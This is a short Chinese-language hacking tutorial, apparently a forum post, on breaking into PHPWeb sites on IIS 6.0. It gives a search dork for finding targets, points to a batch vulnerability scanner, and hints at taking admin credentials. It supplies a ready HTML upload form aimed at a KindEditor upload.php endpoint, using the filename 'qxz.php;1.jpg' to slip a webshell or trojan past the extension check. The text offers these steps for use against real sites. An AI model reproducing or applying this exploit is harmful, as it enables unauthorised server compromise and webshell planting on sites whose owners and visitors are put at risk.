为了达到想要的效率，我们可以批量的找phpweb的站点，

关键字：inurl:news/html/?411.html 也可以用一些web漏洞批量检测的，譬如黑吧安全网web漏洞扫描器，本人也在用的，虽然有点老

不过还是有些作用的。文章最后给出下载地址。对了，现在谷歌不能用了，再给出一个访问谷歌的地址 http://91.213.30.153/

后台网址后面直接加 admin.php 。 账号密码怎么拿就不多说了，都懂的。记住拿iis6.0的站点，进入后台不要关闭

复制以下代码保存为.HTML格式
代码：-
--------------------------------------------------------------------------------------------------------------
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"> 
<input type="text" name="fileName" value="qxz.php;1.jpg" /> 
<input type="hidden" name="attachPath" value="news/pics/" /> 
<input type="file" name="fileData" size="14" /></td> 
<input type="submit" name="button" value="确定" /> 
</form>
-------------------------------------------------------------------------------------
里面的www.xxx.com为你的网址

打开之后会是一个上传的页面，你就把一句话，或者是马上传，记住，后缀一定是这种 qxz.php;1.jpg 格式，然后查看网页源代码，就会有个路径

这就是马的路径，ok就这么简单。